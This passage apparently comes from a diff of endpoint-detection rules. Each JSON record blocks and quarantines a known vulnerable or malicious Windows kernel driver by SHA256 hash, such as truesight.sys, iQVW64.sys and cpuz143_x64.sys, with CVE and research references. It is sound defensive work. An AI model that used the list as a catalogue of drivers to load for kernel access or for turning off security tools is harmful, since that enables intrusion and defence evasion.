+ "hl_testing_start_time": "2026-03-23T11:45:29.972256Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "50bc80ebd0b61bc46a4cacb915602acdecaf47c5c767a020bf103c511327169d",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efb24eae-ecab-599a-bd79-efbd5742e6ba",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.159598Z",
+ "creation_date": "2026-03-23T11:45:31.159600Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.159606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "74b5fca7c4240da63fde43eaebb9253fc09743f350b9ff3e4ca2eec24f264ac7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efb36918-ccb4-57e2-8e7c-321ff1262f45",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823554Z",
+ "creation_date": "2026-03-23T11:45:30.823556Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823562Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a237ca9187b7a3b712c3d82e5a448e424502723bbb5ddc2b7031bc3fda427d39",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efc0d5f3-03e6-56f9-9e0b-e144cf188019",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811916Z",
+ "creation_date": "2026-03-23T11:45:31.811918Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0a915b38bdb60aee912061533f0ca8eb81919daa89b39857a35ec596975f6b4b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efc2d080-97db-5f64-a0a2-bd163c629609",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830204Z",
+ "creation_date": "2026-03-23T11:45:31.830206Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830211Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9b004a79cad9699b5442c85257e1a3f4730d5bb55858958c2de0da9f20c75585",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efd232bd-abaf-5154-aca8-6d97381b1062",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146960Z",
+ "creation_date": "2026-03-23T11:45:32.146963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17a997feed57712f46558b4c99766d5b7722e1b095133b6b391a4743140e45de",
+ "comment": "Vulnerable Kernel Driver (aka CSAgent.sys) [https://www.loldrivers.io/drivers/ca6455d1-b06e-496c-be33-f89c41b27540/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efd4399e-86a5-5b68-905c-8f2a62601ef2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491760Z",
+ "creation_date": "2026-03-23T11:45:31.491762Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491768Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8671130cfa9caf8f7906a045ffe78863d90b39632b040c27b64c8e2e4ef6907e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efe50127-f8fe-5435-a84a-ffbe52c3e57b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488081Z",
+ "creation_date": "2026-03-23T11:45:31.488083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488088Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4e6fa3809d27690bbafec8169babaebf7cad6bbc92a2da46bea44b6449a6555c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efe550dc-8c22-5146-ab27-d9cc169ee7ad",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982922Z",
+ "creation_date": "2026-03-23T11:45:29.982924Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "87aae726bf7104aac8c8f566ea98f2b51a2bfb6097b6fc8aa1f70adeb4681e1b",
+ "comment": "Vulnerable Kernel Driver (aka WiseUnlo.sys) [https://www.loldrivers.io/drivers/b28cc2ee-d4a2-4fe4-9acb-a7a61cad20c6/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "efffb64d-ef10-52c7-8bfa-266432c4c6e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.151955Z",
+ "creation_date": "2026-03-23T11:45:31.151959Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.151968Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7b70df6587cbc7ac03775ccc56a4e9968f043593e5b7f527ea16bafd83da91a5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f009da7d-f665-555f-aab6-c828df633274",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.147518Z",
+ "creation_date": "2026-03-23T11:45:31.147520Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.147525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "65e3626d970e6930fb0b845ca1b248d077b0b28344589b373a6bc4dd17a9d589",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f00ac7d0-b918-5151-b759-f7ef945aa72a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605612Z",
+ "creation_date": "2026-03-23T11:45:29.605614Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605619Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d944cd16626a5e72a3183a6e30e1b44807d4d48d41eb8904beda41de899634e2",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f016559d-ebea-57c9-aa04-28be1a2ca494",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144967Z",
+ "creation_date": "2026-03-23T11:45:32.144969Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144974Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d1ea9e16cefbec53a65a290bb42ee9d6e31218b9d4dfca676b66373cece9a54a",
+ "comment": "Malicious Kernel Driver (aka driver_d1ea9e16.sys) [https://www.loldrivers.io/drivers/8697785a-d088-42a7-ac25-b5c8a3b22664/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f019f337-4c4c-5e3f-b21e-2d853cc47595",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610353Z",
+ "creation_date": "2026-03-23T11:45:29.610355Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.610360Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ef7df384e93951893b65500dac6ee09da6b8fe9128326caad41b8be4da49a1e",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f034cab5-d72a-524a-b8c5-d7cfc6f1cef6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.146836Z",
+ "creation_date": "2026-03-23T11:45:32.146838Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.146844Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb0dbc3b9c897b7571b94fb2203ffb1ac0facfe366b2cb1f91904ea5335018f0",
+ "comment": "Vulnerable Kernel Driver (aka BioNTdrv.sys) [https://www.loldrivers.io/drivers/e6378671-986d-42a1-8e7a-717117c83751/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f037a0a8-4c01-5be7-b117-b8209798deff",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145131Z",
+ "creation_date": "2026-03-23T11:45:32.145133Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145139Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e38eb95fd1593c73311d426dbd85491494a4521aaa4c4ef66e02f7d6d0339171",
+ "comment": "Malicious Kernel Driver (aka driver_4f9b5a2f.sys) [https://www.loldrivers.io/drivers/b660d253-2b60-46c5-b95a-c354aa5eb154/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f03906e9-ffdf-5077-bd2a-d72b34806ee0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152548Z",
+ "creation_date": "2026-03-23T11:45:31.152552Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "56555f87cd6b154ea3ddc4195900fbea74f45cd8376b335864733fd4a51c69e7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0477214-7582-5bda-a0c9-8307b7b9469b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.812379Z",
+ "creation_date": "2026-03-23T11:45:31.812383Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.812391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c02cc59bb4fbe9aa64762b1c91edf512cdfc12a9363d396864354d95d3b8492c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f04a159e-819d-5461-93fd-e0db9e3d8621",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140400Z",
+ "creation_date": "2026-03-23T11:45:31.140402Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140407Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "533efbc6f25ded2d796c0c96c8e1bc8b051117e1592b2e66eafe29faeb2b00b3",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0509759-837a-54d5-afdf-f48f3a85863f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612812Z",
+ "creation_date": "2026-03-23T11:45:29.612814Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612819Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4880f40f2e557cff38100620b9aa1a3a753cb693af16cd3d95841583edcb57a8",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f056e731-5b05-58d5-90ca-2971569220f6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454594Z",
+ "creation_date": "2026-03-23T11:45:30.454597Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454606Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2e2a75c0a5e5cb6c28432ff796d5bd6cb154139498c23b2076b5db06b453acb4",
+ "comment": "Vulnerable Kernel Driver (aka kEvP64.sys) [https://www.loldrivers.io/drivers/fe2f68e1-e459-4802-9a9a-23bb3c2fd331/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f0589276-ba84-5e14-9475-6d65cc5c0998",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615623Z",
+ "creation_date": "2026-03-23T11:45:29.615625Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615631Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c1795ec9d05d0efe56e76bf4b76a09a804d3cd5b0e75bc47049d5ee488fc2bec",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "f05e2246-9183-5025-9309-244870ac083b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.483565Z",
+ "creation_date": "2026-03-23T11:45:31.483569Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.483579Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "44c425bee3b0ec076e2d69aec8f1cba7a0a7e696b5956151f5d5e01daf9a276e",
